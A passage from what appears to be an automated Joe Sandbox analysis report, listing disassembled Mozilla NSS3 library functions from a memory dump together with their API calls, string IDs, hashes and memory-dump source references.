                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-3690128261
                                                                                                                                                                                                                                                                                          • Opcode ID: 29e687a01f777e0786fbdcb66954b9f0348b67a4f8d5f012738913dbe1d7bbc4
                                                                                                                                                                                                                                                                                          • Instruction ID: a35a598604819a144534f47cd5fff598341d9a7360e612b18b2dd79631e29858
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29e687a01f777e0786fbdcb66954b9f0348b67a4f8d5f012738913dbe1d7bbc4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D221E371A011049BDB60AF689F8DF9A37B5EB4231DF844436E80997B02DF7CA948C7D1
                                                                                                                                                                                                                                                                                          Function 6C729DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_SessionCancel), ref: 6C729DF6
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C729E24
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C729E33
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C729E49
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6C729E65
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-1678415578
                                                                                                                                                                                                                                                                                          • Opcode ID: a9c5dd1e2099aec0a660f2c2e513baebe79eea94ab59865c0a0609cfcfe8037b
                                                                                                                                                                                                                                                                                          • Instruction ID: c1b3f5dab004b27a961d027b84cd4a6afbf8e286bacbdab0071ad29ca6bf6a36
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9c5dd1e2099aec0a660f2c2e513baebe79eea94ab59865c0a0609cfcfe8037b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C21E672A02104AFD7609F18DE8DBAB73B9AB5230DF884435E80957B01DF7CA848C7D1
                                                                                                                                                                                                                                                                                          Function 6C6F0F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6F0F62
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6F0F84
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8218D0,?), ref: 6C74B095
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,6C70F59B,6C81890C,?), ref: 6C6F0FA8
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C6F0FC1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: malloc.MOZGLUE(6C748D2D,?,00000000,?), ref: 6C750BF8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: TlsGetValue.KERNEL32(6C748D2D,?,00000000,?), ref: 6C750C15
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C6F0FDB
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C6F0FEF
                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C6F1001
                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C6F1009
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                          • API String ID: 2061345354-3315324353
                                                                                                                                                                                                                                                                                          • Opcode ID: ab47700858652a7e506e3705211a67da0f964f7ae1b81ccec913218c6141f51e
                                                                                                                                                                                                                                                                                          • Instruction ID: a82814fc8d54def764fba5e4b7208b3479a7c6f2cf39e1f921c87f5bc12ae596
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab47700858652a7e506e3705211a67da0f964f7ae1b81ccec913218c6141f51e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 632109B1904204ABE7109F24DE49AABB7B4EF4525DF008528FC1897701FB31EA5ACBD2
                                                                                                                                                                                                                                                                                          Function 6C6F6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,6C6F7D8F,6C6F7D8F,?,?), ref: 6C6F6DC8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C74FE08
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C74FE1D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C74FE62
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C6F7D8F,?,?), ref: 6C6F6DD5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C818FA0,00000000,?,?,?,?,6C6F7D8F,?,?), ref: 6C6F6DF7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8218D0,?), ref: 6C74B095
                                                                                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C6F6E35
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C74FE29
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C74FE3D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C74FE6F
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C6F6E4C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75116E
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C818FE0,00000000), ref: 6C6F6E82
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C6FB21D,00000000,00000000,6C6FB219,?,6C6F6BFB,00000000,?,00000000,00000000,?,?,?,6C6FB21D), ref: 6C6F6B01
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C6F6B8A
                                                                                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C6F6F1E
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C6F6F35
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C818FE0,00000000), ref: 6C6F6F6B
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,6C6F7D8F,?,?), ref: 6C6F6FE1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 587344769-0
                                                                                                                                                                                                                                                                                          • Opcode ID: b9c4c66744cfeed5bab5a3f2e7468c962a303c8a7957923a54e98b085ef00301
                                                                                                                                                                                                                                                                                          • Instruction ID: 97a59102724b1d742f6a7c9b2739f0f770517e91e1393cbd521427497dee81a3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9c4c66744cfeed5bab5a3f2e7468c962a303c8a7957923a54e98b085ef00301
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6371D271E112469FEB00CF15CE44BAABBA6FF95308F154229E818D7B11F730EA95CB94
                                                                                                                                                                                                                                                                                          Function 6C730FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C731057
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C731085
                                                                                                                                                                                                                                                                                          • PK11_GetAllTokens.NSS3 ref: 6C7310B1
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C731107
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C731172
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C731182
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C7311A6
                                                                                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C7311C5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7352C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C70EAC5,00000001), ref: 6C7352DF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7352C0: EnterCriticalSection.KERNEL32(?), ref: 6C7352F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7352C0: PR_Unlock.NSS3(?), ref: 6C735358
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7311D3
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7311F3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1549229083-0
                                                                                                                                                                                                                                                                                          • Opcode ID: fae903b982a677a453ebc93a843787e2d3b432a32dceab3e02072a08ccd6a1ce
                                                                                                                                                                                                                                                                                          • Instruction ID: ea51cd509ab0dd301c4acfdcb54bd8678ef99e6c31855c3bf8e920dff9972227
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fae903b982a677a453ebc93a843787e2d3b432a32dceab3e02072a08ccd6a1ce
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 906193B0E013559BEB00DF64DA85BAABBB5AF04348F145138EC1DAB742EB31E954CB91
                                                                                                                                                                                                                                                                                          Function 6C73ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AE10
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AE24
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,6C71D079,00000000,00000001), ref: 6C73AE5A
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AE6F
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(85145F8B,?,?,?,?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AE7F
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AEB1
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AEC9
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AEF1
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(6C71CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C71CDBB,?), ref: 6C73AF0B
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C71CDBB,?,6C71D079,00000000,00000001), ref: 6C73AF30
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 161582014-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 64bb6e7d74ff36a7e517024e107be32f45f6f72a2287ba5cfe52fa2b5ed95a81
                                                                                                                                                                                                                                                                                          • Instruction ID: 75fcbc23ff7d1240b06a60d6141d1082809abd413bae4548f5da8329d1ef30ac
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64bb6e7d74ff36a7e517024e107be32f45f6f72a2287ba5cfe52fa2b5ed95a81
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6251CEB1A00612AFDF10DF65D986A56B7B8FF08328F145674E80C97A52E731E864CBD1
                                                                                                                                                                                                                                                                                          Function 6C714CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C71AB7F,?,00000000,?), ref: 6C714CB4
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6C71AB7F,?,00000000,?), ref: 6C714CC8
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C71AB7F,?,00000000,?), ref: 6C714CE0
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C71AB7F,?,00000000,?), ref: 6C714CF4
                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?,?,6C71AB7F,?,00000000,?), ref: 6C714D03
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,00000000,?), ref: 6C714D10
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: TlsGetValue.KERNEL32 ref: 6C79DD8C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C79DDB4
                                                                                                                                                                                                                                                                                          • PR_Now.NSS3(?,00000000,?), ref: 6C714D26
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C800A27), ref: 6C7B9DC6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C800A27), ref: 6C7B9DD1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7B9DED
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C714D98
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C714DDA
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C714E02
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4032354334-0
                                                                                                                                                                                                                                                                                          • Opcode ID: b1bc3f3eb9e9af71c89f00c1b566d7aa0d625334bb859465cf5981b3c0a1d386
                                                                                                                                                                                                                                                                                          • Instruction ID: e61c1ca125c594a001b143c713dd0809fd1dabc2ccc81491c3aeece87d701fb3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1bc3f3eb9e9af71c89f00c1b566d7aa0d625334bb859465cf5981b3c0a1d386
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1641C6F5A04201ABEF11AF24EE49A6677F8BF1521DF094171ED0887B12EB31D918D7D2
                                                                                                                                                                                                                                                                                          Function 6C6FBFF0 Relevance: 15.1, APIs: 10, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C6FBFFB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6F87ED,00000800,6C6EEF74,00000000), ref: 6C751000
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PR_NewLock.NSS3(?,00000800,6C6EEF74,00000000), ref: 6C751016
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PL_InitArenaPool.NSS3(00000000,security,6C6F87ED,00000008,?,00000800,6C6EEF74,00000000), ref: 6C75102B
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6C6FC015
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6C6FC032
                                                                                                                                                                                                                                                                                          • DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6C6FC04D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7469E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C746A47
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7469E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6C746A64
                                                                                                                                                                                                                                                                                          • DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6C6FC064
                                                                                                                                                                                                                                                                                          • CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6C6FC07B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F8980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C6F7310), ref: 6C6F89B8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F8980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C6F7310), ref: 6C6F89E6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F8980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C6F8A00
